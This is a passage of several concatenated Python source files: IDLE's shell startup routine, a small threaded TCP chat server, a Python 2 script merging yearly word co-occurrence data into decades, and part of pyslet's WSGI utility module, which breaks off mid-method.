echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif not macosx.isAquaTk():
if TkVersion >= 8.6:
ext = '.png'
sizes = (16, 32, 48, 256)
else:
ext = '.gif'
sizes = (16, 32, 48)
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in sizes]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic issues and print warning message(s) in
# the IDLE shell window; this is less intrusive than always
# opening a separate window.
# Warn if using a problematic OS X Tk version.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.show_warning(tkversionwarning)
# Warn if the "Prefer tabs when opening documents" system
# preference is set to "Always".
prefer_tabs_preference_warning = macosx.preferTabsPreferenceWarning()
if prefer_tabs_preference_warning:
shell.show_warning(prefer_tabs_preference_warning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
socket_server.py
|
"""
0。 实例化服务端,绑定窗口,监听
1。 接受连接请求,创建并返回
2。 接收客户端发送过来的信息
3。 向客户端发送信息
注意,socket通信传输的信息是字节码,并且双方都可以关闭通信
"""
import socket
import threading
# 实例化服务端
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 绑定
server.bind(('0.0.0.0', 6959))
# 监听
server.listen(5)
def handle_sock(sock):
    while True:
        # Receive data from the client
        recv_data = sock.recv(1024)  # bufsize: read up to 1024 bytes at a time
        if not recv_data:
            # An empty read means the client closed the connection
            break
        print(recv_data.decode("utf8"))
        # Send a reply back to the client
        res_data = input()
        sock.send(res_data.encode("utf8"))
while True:
    # Accept a client connection request and establish the connection
    sock, __ = server.accept()
    # Handle the new connection (client) in its own thread
    client_thread = threading.Thread(target=handle_sock, args=(sock,))
    client_thread.start()
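# A minimal sketch of a matching client (hypothetical, for illustration only);
# the host and port mirror the bind() call above, and the send/receive loop is
# reduced to a single exchange:
#
#     import socket
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect(('127.0.0.1', 6959))
#     client.send("hello".encode("utf8"))
#     print(client.recv(1024).decode("utf8"))
#     client.close()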
|
makedecades.py
|
import argparse
import collections
from multiprocessing import Process, Queue
from Queue import Empty
from vecanalysis.representations.explicit import Explicit
from cooccurrence.matstore import export_mat_from_dict
from ioutils import mkdir, write_pickle, load_pickle
def get_index(merged_index, year_list, index):
word = year_list[index]
if word in merged_index:
new_index = merged_index[word]
else:
new_index = len(merged_index)
merged_index[word] = new_index
return new_index
def worker(proc_num, queue, out_dir, in_dir):
while True:
try:
decade = queue.get(block=False)
except Empty:
break
print "Processing decade", decade
counts = collections.defaultdict(int)
for year in range(10):
embed = Explicit.load(in_dir + str(decade + year) + ".bin", normalize=False)
if year == 0:
merged_index = embed.wi
year_list = load_pickle(in_dir + str(decade + year) + "-list.pkl")
mat = embed.m.tocoo()
for i in xrange(len(mat.data)):
if mat.data[i] == 0:
continue
new_row = get_index(merged_index, year_list, mat.row[i])
new_col = get_index(merged_index, year_list, mat.col[i])
counts[(new_row, new_col)] += mat.data[i]
print "Done year ", decade + year
export_mat_from_dict(counts, decade, out_dir)
write_pickle(merged_index, out_dir + str(decade) + "-index.pkl")
write_pickle(list(merged_index), out_dir + str(decade) + "-list.pkl")
def run_parallel(num_procs, out_dir, in_dir, decades):
queue = Queue()
for decade in decades:
queue.put(decade)
procs = [Process(target=worker, args=[i, queue, out_dir, in_dir]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Merges years of raw 5gram data.")
parser.add_argument("out_dir", help="path to network data (also where output goes)")
parser.add_argument("in_dir", help="path to network data (also where output goes)")
parser.add_argument("num_procs", type=int, help="number of processes to spawn")
parser.add_argument("--start-year", type=int, help="start year (inclusive)")
parser.add_argument("--end-year", type=int, help="end year (inclusive)")
args = parser.parse_args()
decades = range(args.start_year, args.end_year + 1, 10)
decades.reverse()
mkdir(args.out_dir)
run_parallel(args.num_procs, args.out_dir + "/", args.in_dir + "/", decades)
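# A sketch of a typical invocation (illustrative only; the script uses Python 2
# syntax).  It assumes yearly files named like <in_dir>/1850.bin and
# <in_dir>/1850-list.pkl; the paths and years below are placeholders:
#
#     python makedecades.py /data/decades /data/years 4 \
#         --start-year 1850 --end-year 1990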
|
wsgi.py
|
#! /usr/bin/env python
"""Utilities for writing applications based on wsgi"""
import base64
import binascii
import cgi
import io
import json
import logging
import mimetypes
import optparse
import os
import quopri
import random
import sys
import threading
import time
import traceback
from hashlib import sha256
from wsgiref.simple_server import make_server
from . import iso8601 as iso
from .http import (
cookie,
messages,
params)
from .odata2 import (
core as odata,
csdl as edm,
metadata as edmx)
from .odata2.sqlds import SQLEntityContainer
from .py2 import (
byte_value,
dict_items,
force_ascii,
force_bytes,
input3,
is_ascii,
is_text,
is_unicode,
long2,
parse_qs,
range3,
to_text,
UnicodeMixin,
urlencode,
urlquote)
from .rfc2396 import (
escape_data,
FileURL,
unescape_data,
URI)
from .xml import structures as xml
from .vfs import OSFilePath
try:
from Crypto.Cipher import AES
from Crypto import Random
got_crypto = True
except ImportError:
got_crypto = False
logger = logging.getLogger('pyslet.wsgi')
class BadRequest(Exception):
"""An exception that will generate a 400 response code"""
pass
class PageNotAuthorized(BadRequest):
"""An exception that will generate a 403 response code"""
pass
class PageNotFound(BadRequest):
"""An exception that will generate a 404 response code"""
pass
class MethodNotAllowed(BadRequest):
"""An exception that will generate a 405 response code"""
pass
class SessionError(RuntimeError):
"""Unexpected session handling error"""
pass
def generate_key(key_length=128):
"""Generates a new key
key_length
The minimum key length in bits. Defaults to 128.
The key is returned as a sequence of 16 bit hexadecimal
strings separated by '.' to make them easier to read and
transcribe into other systems."""
key = []
if key_length < 1:
raise ValueError("wsgi.generate_key(%i)" % key_length)
nfours = (key_length + 15) // 16
try:
rbytes = os.urandom(nfours * 2)
for i in range3(nfours):
four = "%02X%02X" % (
byte_value(rbytes[2 * i]), byte_value(rbytes[2 * i + 1]))
key.append(four)
except NotImplementedError:
logger.warning("urandom required for secure key generation")
for i in range3(nfours):
four = []
for j in range3(4):
four.append(random.choice('0123456789ABCDEF'))
key.append(''.join(four))
return '.'.join(key)
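# A minimal sketch showing how the documented key format (dot-separated groups
# of four hex digits, e.g. '1A2B.3C4D.5E6F.7081' for the default 128-bit
# length) could be turned back into raw bytes.  _example_key_bytes is a
# hypothetical helper added only for illustration.
def _example_key_bytes(key_str):
    # drop the '.' separators and decode the remaining hex digits
    return binascii.unhexlify(key_str.replace('.', ''))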
def key60(src):
"""Generates a non-negative 60-bit long from a source string.
src
A binary string.
The idea behind this function is to create an (almost) unique
integer from a given string. The integer can then be used as the
key field of an associated entity without having to create foreign
keys that are long strings. There is of course a small chance that
two source strings will result in the same integer.
The integer is calculated by truncating the SHA256 hexdigest to 15
characters (60-bits) and then converting to long. Future versions
of Python promise improvements here, which would allow us to squeeze
an extra 3 bits using int.from_bytes but alas, not in Python 2.x"""
return long2(sha256(src).hexdigest()[0:15], 16)
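# A minimal sketch of key60 in use: deriving a numeric entity key from a user
# name, as suggested by the docstring above.  _example_user_id is a
# hypothetical helper added only for illustration.
def _example_user_id(user_name):
    # key60 expects a binary string, so encode text values first
    return key60(user_name.encode('utf-8'))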
class WSGIContext(object):
"""A class used for managing WSGI calls
environ
The WSGI environment
start_response
The WSGI call-back
canonical_root
A URL that overrides the automatically derived canonical root,
see :class:`WSGIApp` for more details.
This class acts as a holding place for information specific to each
request being handled by a WSGI-based application. In some
frameworks this might be called the request object but we already
have requests modelled in the http package and, anyway, this holds
information about the WSGI environment and the response too."""
#: The maximum amount of content we'll read into memory (64K)
MAX_CONTENT = 64 * 1024
def __init__(self, environ, start_response, canonical_root=None):
#: the WSGI environ
self.environ = environ
#: the WSGI start_response callable
self.start_response_method = start_response
#: the response status code (an integer), see :meth:`set_status`
self.status = None
#: the response status message (a string), see :meth:`set_status`
self.status_message = None
#: a *list* of (name, value) tuples containing the headers to
#: return to the client. name and value must be strings
self.headers = []
if canonical_root is None:
self._canonical_root = self._get_canonical_root()
else:
self._canonical_root = canonical_root
self._query = None
self._content = None
self._form = None
self._cookies = None
def set_status(self, code):
"""Sets the status of the response
code
An HTTP *integer* response code.
This method sets the :attr:`status_message` automatically from
the code. You must call this method before calling
start_response."""
self.status = code
self.status_message = messages.Response.REASON.get(code, "Unknown")
def add_header(self, name, value):
"""Adds a header to the response
name
The name of the header (a string)
value
The value of the header (a string)"""
self.headers.append((name, value))
def start_response(self):
"""Calls the WSGI start_response method
If the :attr:`status` has not been set a 500 response is
generated. The status string is created automatically from
:attr:`status` and :attr:`status_message` and the headers are
set from :attr:`headers`.
The return value is the return value of the WSGI start_response
call, an obsolete callable that older applications use to write
the body data of the response.
If you want to use the exc_info mechanism you must call
start_response yourself directly using the value of
:attr:`start_response_method`"""
if self.status is None:
self.status = 500
self.status_message = messages.Response.REASON.get(500,
"No status")
return self.start_response_method(
"%i %s" % (self.status, self.status_message), self.headers)
def get_app_root(self):
"""Returns the root of this application
The result is a :class:`pyslet.rfc2396.URI` instance, It is
calculated from the environment in the same way as
:meth:`get_url` but only examines the SCRIPT_NAME portion of the
path.
It always ends in a trailing slash. So if you have a script
bound to /script/myscript.py running over http on
www.example.com then you will get::
http://www.example.com/script/myscript.py/
This allows you to generate absolute URLs by resolving them relative
to the computed application root, e.g.::
URI.from_octets('images/counter.png').resolve(
context.get_app_root())
would return::
http://www.example.com/script/myscript.py/images/counter.png
for the above example. This is preferable to using absolute
paths which would strip away the SCRIPT_NAME prefix when used."""
url = [self._canonical_root]
script = urlquote(self.environ.get('SCRIPT_NAME', ''))
if not script:
url.append('/')
else:
url.append(script)
# we always add the slash, that's our root URL
if script[-1] != '/':
url.append('/')
return URI.from_octets(''.join(url))
def get_url(self):
"""Returns the URL used in the request
The result is a :class:`pyslet.rfc2396.URI` instance, It is
calculated from the environment using the algorithm described in
URL Reconstruction section of the WSGI specification except
that it ignores the Host header for security reasons.
Unlike the result of :meth:`get_app_root` it *doesn't*
necessarily end with a trailing slash. So if you have a script
bound to /script/myscript.py running over http on
www.example.com then you may get::
http://www.example.com/script/myscript.py
A good pattern to adopt when faced with a missing trailing slash
on a URL that is intended to behave as a 'directory' is to add
the slash to the URL and use xml:base (for XML responses) or
HTML's <base> tag to set the root for relative links. The
alternative is to issue an explicit redirect but this requires
another request from the client.
This causes particular pain in OData services which frequently
respond on the service script's URL without a slash but generate
incorrect relative links to the contained feeds as a result."""
url = [self._canonical_root]
url.append(urlquote(self.environ.get('SCRIPT_NAME', '')))
url.append(urlquote(self.environ.get('PATH_INFO', '')))
query = self.environ.get('QUERY_STRING', '')
if query:
url += ['?', query]
return URI.from_octets(''.join(url))
def _get_canonical_root(self):
url = [self.environ['wsgi.url_scheme'], '://']
sflag = (self.environ['wsgi.url_scheme'] == 'https')
authority = self.environ['SERVER_NAME']
port = self.environ['SERVER_PORT']
if sflag:
if port != '443':
url.append("%s:%s" % (authority, port))
else:
url.append(authority)
elif port != '80':
url.append("%s:%s" % (authority, port))
else:
url.append(authority)
return ''.join(url)
def get_query(self):
"""Returns a dictionary of query parameters
The dictionary maps parameter names onto strings. In cases
where multiple values have been supplied the values are comma
separated, so a URL ending in ?option=Apple&option=Pear would
result in the dictionary::
{'option': 'Apple,Pear'}
This method only computes the dictionary once, future calls
return the same dictionary!
Note that the dictionary does not contain any cookie values or
form parameters."""
if self._query is None:
self._query = parse_qs(
self.environ.get('QUERY_STRING', ''))
for n, v in list(dict_items(self._query)):
self._query[n] = ','.join(v)
return self._query
def get_content(self):
"""Returns the content of the request as a string
The content is read from the input, up to CONTENT_LENGTH bytes,
and is returned as a binary string. If the content exceeds
:attr:`MAX_CONTENT` (default: 64K) then BadRequest is raised.
This method can be called multiple times, the content is only
actually read from the input the first time. Subsequent calls
return the same string.
This call cannot be called on the same context as
:meth:`get_form`, whichever is called first takes precedence.
Calls to get_content after get_form return None."""
if self._form is None and self._content is None:
length = self.environ.get('CONTENT_LENGTH', '')
if length.isdigit():
length = int(length)
else:
length = 0
if length <= self.MAX_CONTENT:
input = self.environ['wsgi.input']
f = io.BytesIO()
while length:
part = input.read(length)
if not part:
break
f.write(part)
length -= len(part)
self._content = f.getvalue()
else:
raise BadRequest("Too much data")
return self._content
def get_form(self):
"""Returns a FieldStorage object parsed from the content.
The query string is excluded before the form is parsed as this
only covers parameters submitted in the content of the request.
To search the query string you will need to examine the
dictionary returned by :meth:`get_query` too.
This method can be called multiple times, the form is only
actually read from the input the first time. Subsequent calls
return the same FieldStorage object.
This call cannot be called on the same context as
:meth:`get_content`, whichever is called first takes
precedence. Calls to get_form after get_content return None.
Warning: get_form will only parse the form from the content if
the request method was POST!"""
if self._form is None and self._content is None:
post_environ = self.environ.copy()
post_environ['QUERY_STRING'] = ''
self._form = cgi.FieldStorage(
fp=post_environ['wsgi.input'], environ=post_environ,
keep_blank_values=True)
return self._form
def get_form_string(self, name, max_length=0x10000):
"""Returns the value of a string parameter from the form.
name
The name of the parameter
max_length (optional, defaults to 64KB)
Due to an issue in the implementation of FieldStorage it
isn't actually possible to definitively tell the difference
between a file upload and an ordinary input field. HTML5
clarifies the situation to say that ordinary fields don't
have a content type but FieldStorage assumes 'text/plain' in
this case and sets the file and type attribute of the field
anyway.
To prevent obtuse clients sending large files disguised as
ordinary form fields, tricking your application into loading
them into memory, this method checks the size of any file
attribute (if present) against max_length before returning
the field's value.
If the parameter is missing from the form then an empty string
is returned."""
form = self.get_form()
if name in form:
result = form[name]
if isinstance(result, list):
return ','.join([x.value for x in result])
else:
if result.file:
# could be an ordinary field in multipart/form-data
fpos = result.file.tell()
result.file.seek(0, io.SEEK_END)
fsize = result.file.tell()
result.file.seek(fpos)
if fsize > max_length:
raise BadRequest
# result.value could be bytes or (text) str
value = result.value
if isinstance(value, bytes):
charset = 'ascii'
if result.type_options is not None:
charset = result.type_options.get('charset',
'ascii')
return value.decode(charset)
else:
return value
return result.value
return ''
def get_form_long(self, name):
"""Returns the value of a (long) integer parameter from the form.
name
The name of the parameter
If the parameter is missing from the form then None is returned,
if the parameter is present but is not a valid integer then
:class:`BadRequest` is raised."""
value = self.get_form_string(name, 256)
try:
return long2(value)
except ValueError as err:
logging.debug("get_form_long: %s", str(err))
raise BadRequest
def get_cookies(self):
"""Returns a dictionary of cookies from the request
If no cookies were passed an empty dictionary is returned.
For details of how multi-valued cookies are handled see:
:meth:`pyslet.http.cookie.CookieParser.request_cookie_string`."""
if self._cookies is None:
cookie_values = self.environ.get('HTTP_COOKIE', None)
if cookie_values is not None:
p = cookie.CookieParser(cookie_values)
self._cookies = p.require_cookie_string()
for name in self._cookies:
value = self._cookies[name]
if isinstance(value, set):
# join the items into a single string
value = list(value)
value.sort()
self._cookies[name] = b','.join(value)
else:
self._cookies = {}
return self._cookies
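# A minimal sketch of a WSGI callable built directly on WSGIContext, using
# only the methods documented above (set_status, add_header, start_response).
# The function name _example_hello_app is hypothetical, added for illustration.
def _example_hello_app(environ, start_response):
    context = WSGIContext(environ, start_response)
    data = b"Hello, world!"
    context.set_status(200)
    context.add_header("Content-Type", "text/plain")
    context.add_header("Content-Length", str(len(data)))
    context.start_response()
    return [data]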
class DispatchNode(object):
"""An opaque class used for dispatching requests."""
def __init__(self):
self._handler = None
self._wildcard = None
self._nodes = {}
class WSGIApp(DispatchNode):
"""An object to help support WSGI-based applications.
Instances are designed to be callable by the WSGI middle-ware, on
creation each instance is assigned a random identifier which is used
to provide comparison and hash implementations. We go to this
trouble so that derived classes can use techniques like the
functools lru_cache decorator in future versions."""
#: the context class to use for this application, must be (derived
#: from) :class:`WSGIContext`
ContextClass = WSGIContext
#: The path to the directory for :attr:`static_files`. Defaults to
#: None. An :class:`pyslet.vfs.OSFilePath` instance.
static_files = None
private_files = None
"""Private data diretory
An :class:`pyslet.vfs.OSFilePath` instance.
The directory used for storing private data. The directory is
partitioned into sub-directories based on the lower-cased class name
of the object that owns the data. For example, if private_files is
set to '/var/www/data' and you derive a class called 'MyApp' from
WSGIApp you can assume that it is safe to store and retrieve private
data files from '/var/www/data/myapp'.
private_files defaults to None for safety. The current WSGIApp
implementation does not depend on any private data."""
settings_file = None
"""The path to the settings file. Defaults to None.
An :class:`pyslet.vfs.OSFilePath` instance.
The format of the settings file is a json dictionary. The
dictionary's keys are class names that define a scope for
class-specific settings. The key 'WSGIApp' is reserved for settings
defined by this class. The defined settings are:
level (None)
If specified, used to set the root logging level, a value
between 0 (NOTSET) and 50 (CRITICAL). For more information see
python's logging module.
port (8080)
The port number used by :meth:`run_server`
canonical_root ("http://localhost" or "http://localhost:<port>")
The canonical URL scheme, host (and port if required) for the
application. This value is passed to the context and used by
:meth:`WSGIContext.get_url` and similar methods in preference to
        the SERVER_NAME and SERVER_PORT to construct absolute URLs
returned or recorded by the application. Note that the Host
header is always ignored to prevent related `security attacks`__.
.. __:
http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
If no value is given then the default is calculated taking in to
consideration the port setting.
interactive (False)
Sets the behaviour of :meth:`run_server`, if specified the main
thread prompts the user with a command line interface allowing
you to interact with the running server. When False, run_server
will run forever and can only be killed by an application
request that sets :attr:`stop` to True or by an external signal
that kills the process.
static (None)
A URL to the static files (not a local file path). This will
normally be an absolute path or a relative path. Relative paths
are relative to the settings file in which the setting is
defined. As URL syntax is used you must use the '/' as a path
separator and add proper URL-escaping. On Windows, UNC paths
can be specified by putting the host name in the authority
section of the URL.
private (None)
A URL to the private files. Interpreted as per the 'static'
setting above."""
#: the class settings loaded from :attr:`settings_file` by
#: :meth:`setup`
settings = None
#: the base URI of this class, set from the path to the settings
#: file itself and is used to locate data files on the server. This
#: is a :class:`pyslet.rfc2396.FileURL` instance. Not to be confused
#: with the base URI of resources exposed by the application this
#: class implements!
base = None
#: the base URI of this class' private files. This is set from the
#: :attr:`private_files` member and is a
#: :class:`pyslet.rfc2396.FileURL` instance
private_base = None
content_type = {
'ico': params.MediaType('image', 'vnd.microsoft.icon'),
}
"""The mime type mapping table.
This table is used before falling back on Python's built-in
guess_type function from the mimetypes module. Add your own custom
mappings here.
It maps file extension (without the dot) on to
:class:`~pyslet.http.params.MediaType` instances."""
#: the maximum chunk size to read into memory when returning a
#: (static) file. Defaults to 64K.
MAX_CHUNK = 0x10000
#: the integer millisecond time (since the epoch) corresponding to
#: 01 January 1970 00:00:00 UTC the JavaScript time origin.
js_origin = int(
iso.TimePoint(
date=iso.Date(century=19, year=70, month=1, day=1),
time=iso.Time(hour=0, minute=0, second=0, zdirection=0)
).get_unixtime() * 1000)
#: a threading.RLock instance that can be used to lock the class
#: when dealing with data that might be shared amongst threads.
clslock = threading.RLock()
_nextid = 1
@classmethod
def main(cls):
"""Runs the application
Options are parsed from the command line and used to
:meth:`setup` the class before an instance is created and
launched with :meth:`run_server`."""
parser = optparse.OptionParser()
cls.add_options(parser)
(options, args) = parser.parse_args()
cls.setup(options=options, args=args)
app = cls()
app.run_server()
@classmethod
def add_options(cls, parser):
"""Defines command line options.
parser
An OptionParser instance, as defined by Python's built-in
optparse module.
The following options are added to *parser* by the base
implementation:
-v Sets the logging level to WARNING, INFO or DEBUG
depending on the number of times it is specified.
Overrides the 'level' setting in the settings file.
-p, --port Overrides the value of the 'port' setting in the
settings file.
-i, --interactive Overrides the value of the 'interactive'
setting in the settings file.
--static Overrides the value of :attr:`static_files`.
--private Overrides the value of :attr:`private_files`.
--settings Sets the path to the :attr:`settings_file`."""
parser.add_option(
"-v", action="count", dest="logging",
default=None, help="increase verbosity of output up to 3x")
parser.add_option(
"-p", "--port", action="store", dest="port",
default=None, help="port on which to listen")
parser.add_option(
"-i", "--interactive", dest="interactive", action="store_true",
default=None,
help="Enable interactive prompt after starting server")
parser.add_option(
"--static", dest="static", action="store", default=None,
help="Path to the directory of static files")
parser.add_option(
"--private", dest="private", action="store", default=None,
help="Path to the directory for data files")
parser.add_option(
"--settings", dest="settings", action="store", default=None,
help="Path to the settings file")
@classmethod
def setup(cls, options=None, args=None, **kwargs):
"""Perform one-time class setup
options
An optional object containing the command line options, such
as an optparse.Values instance created by calling parse_args
on the OptionParser instance passed to
:meth:`add_options`.
args
An optional list of positional command-line arguments such
as would be returned from parse_args after the options have
been removed.
All arguments are given as keyword arguments to enable use
of super and diamond inheritance.
The purpose of this method is to perform any actions required
to setup the class prior to the creation of any instances.
The default implementation loads the settings file and sets the
value of :attr:`settings`. If no settings file can be found
then an empty dictionary is created and populated with any
overrides parsed from options.
Finally, the root logger is initialised based on the level
setting.
Derived classes should always use super to call the base
implementation before their own setup actions are performed."""
if options and options.static:
cls.static_files = OSFilePath(options.static).abspath()
if options and options.private:
cls.private_files = OSFilePath(options.private).abspath()
if options and options.settings:
cls.settings_file = OSFilePath(options.settings).abspath()
if is_text(cls.settings_file):
cls.settings_file = OSFilePath(cls.settings_file)
cls.settings = {}
if cls.settings_file:
cls.base = URI.from_virtual_path(cls.settings_file)
if cls.settings_file.isfile():
with cls.settings_file.open('rb') as f:
cls.settings = json.loads(f.read().decode('utf-8'))
settings = cls.settings.setdefault('WSGIApp', {})
if options and options.logging is not None:
settings['level'] = (
logging.ERROR, logging.WARNING, logging.INFO,
logging.DEBUG)[min(options.logging, 3)]
level = settings.setdefault('level', None)
if level is not None:
logging.basicConfig(level=settings['level'])
if options and options.port is not None:
settings['port'] = int(options.port)
else:
settings.setdefault('port', 8080)
settings.setdefault(
'canonical_root', "http://localhost%s" %
("" if settings['port'] == 80 else (":%i" % settings['port'])))
if options and options.interactive is not None:
settings['interactive'] = options.interactive
else:
settings.setdefault('interactive', False)
url = settings.setdefault('static', None)
if cls.static_files is None and url:
cls.static_files = cls.resolve_setup_path(url)
if is_text(cls.static_files):
# catch older class definitions
cls.static_files = OSFilePath(cls.static_files)
url = settings.setdefault('private', None)
if cls.private_files is None and url:
cls.private_files = cls.resolve_setup_path(url)
if is_text(cls.private_files):
cls.private_files = OSFilePath(cls.private_files)
if cls.private_files:
cls.private_base = URI.from_virtual_path(
cls.private_files.join(''))
# this logging line forces the root logger to be initialised
# with the default level as a catch all
logging.debug("Logging configured for %s", cls.__name__)
@classmethod
def resolve_setup_path(cls, uri_path, private=False):
"""Resolves a settings-relative path
uri_path
The relative URI of a file or directory.
private (False)
Resolve relative to the private files directory
Returns uri_path as an OSFilePath instance after resolving relative
to the settings file location or to the private files location
as indicated by the private flag. If the required location is
not set then uri_path must be an absolute file URL (starting
with, e.g., file:///). On Windows systems the authority
component of the URL may be used to specify the host name for a
UNC path."""
url = URI.from_octets(uri_path)
if private and cls.private_base:
url = url.resolve(cls.private_base)
elif not private and cls.base:
url = url.resolve(cls.base)
if not url.is_absolute() and not isinstance(url, FileURL):
raise RuntimeError("Can't resolve setup path %s" % uri_path)
return url.get_virtual_file_path()
def __init__(self):
# keyword arguments end here, no more super after WSGIApp
DispatchNode.__init__(self)
#: flag: set to True to request :meth:`run_server` to exit
self.stop = False
with self.clslock:
#: a unique ID for this instance
self.id = WSGIApp._nextid
WSGIApp._nextid += 1
self.init_dispatcher()
def __cmp__(self, other):
if not isinstance(other, WSGIApp):
raise TypeError
# compare first by class name, then by instance ID
result = cmp(self.__class__.__name__, other.__class__.__name__)
if not result:
result = cmp(self.id, other.id)
return result
def __hash__(self):
return self.id
def init_dispatcher(self):
"""Used to initialise the dispatcher.
By default all requested paths generate a 404 error. You
register pages during :meth:`init_dispatcher` by calling
:meth:`set_method`. Derived classes should use super
to pass the call to their parents."""
pass
def set_method(self, path, method):
"""Registers a bound method in the dispatcher
path
A path or path pattern
method
A bound method or callable with the basic signature::
result = method(context)
A star in the path is treated as a wildcard and matches a
complete path segment. A star at the end of the path (which
must be after a '/') matches any sequence of path segments. The
matching sequence may be empty, in other words, "/images/*"
matches "/images/". In keeping with common practice a missing
trailing slash is ignored when dispatching so "/images" will
also be routed to a method registered with "/images/*" though if
a separate registration is made for "/images" it will be matched
in preference.
Named matches always take precedence over wildcards so you can
register "/images/*" and "/images/counter.png" and the latter
path will be routed to its preferred handler. Similarly you can
register "/*/background.png" and "/home/background.png" but
remember the '*' only matches a single path component! There is
no way to match background.png in any directory."""
path = path.split('/')
if not path:
path = ['']
node = self
pleft = len(path)
for p in path:
pleft -= 1
old_node = node
if p == '*' and not pleft:
# set a special flag, e.g., if /a/* is declared and we
# have an unmatched /a we'll call that handler anyway
old_node._wildcard = method
node = old_node._nodes.get(p, None)
if not node:
node = DispatchNode()
old_node._nodes[p] = node
node._handler = method
def call_wrapper(self, environ, start_response):
"""Alternative entry point for debugging
Although instances are callable you may use this method instead
as your application's entry point when debugging.
This method will log the environ variables, the headers output
by the application and all the data (in quoted-printable form)
returned at DEBUG level.
It also catches a common error, that of returning something
other than a string for a header value or in the generated
output. These are logged at ERROR level and converted to
strings before being passed to the calling framework."""
# make a closure
def wrap_response(status, response_headers, exc_info=None):
if not is_ascii(status):
logger.error("Value for status line: %s", repr(status))
status = force_ascii(to_text(status))
logger.debug("*** START RESPONSE ***")
logger.debug(status)
new_headers = []
for h, v in response_headers:
if not is_ascii(h):
logger.error("Header name: %s", repr(h))
h = force_ascii(to_text(h))
if not is_ascii(v):
logger.error("Header value: %s: %s", h, repr(v))
v = force_ascii(to_text(v))
logger.debug("%s: %s", h, v)
new_headers.append((h, v))
return start_response(status, new_headers, exc_info)
logger.debug("*** START REQUEST ***")
for key in environ:
logger.debug("%s: %s", key, str(environ[key]))
blank = False
for data in self(environ, wrap_response):
if not blank:
logger.debug("")
blank = True
if not isinstance(data, bytes):
logger.error("Bad type for response data in %s\n%s",
str(environ['PATH_INFO']), repr(data))
if is_unicode(data):
data = data.encode('utf-8')
else:
data = bytes(data)
else:
logger.debug(quopri.encodestring(data))
yield data
def __call__(self, environ, start_response):
context = self.ContextClass(
environ, start_response,
self.settings['WSGIApp']['canonical_root'])
try:
path = context.environ['PATH_INFO'].split('/')
if not path:
# empty path
path = ['']
i = 0
node = self
wildcard = None
stack = []
while i < len(path):
p = path[i]
old_node = node
wild_node = old_node._nodes.get('*', None)
node = old_node._nodes.get(p, None)
if node:
if wild_node:
# this is a fall-back node, push it
stack.append((i, wild_node, wildcard))
elif wild_node:
node = wild_node
elif wildcard:
# if there is an active wildcard, use it
break
elif stack:
i, node, wildcard = stack.pop()
else:
break
if node._wildcard is not None:
wildcard = node._wildcard
i += 1
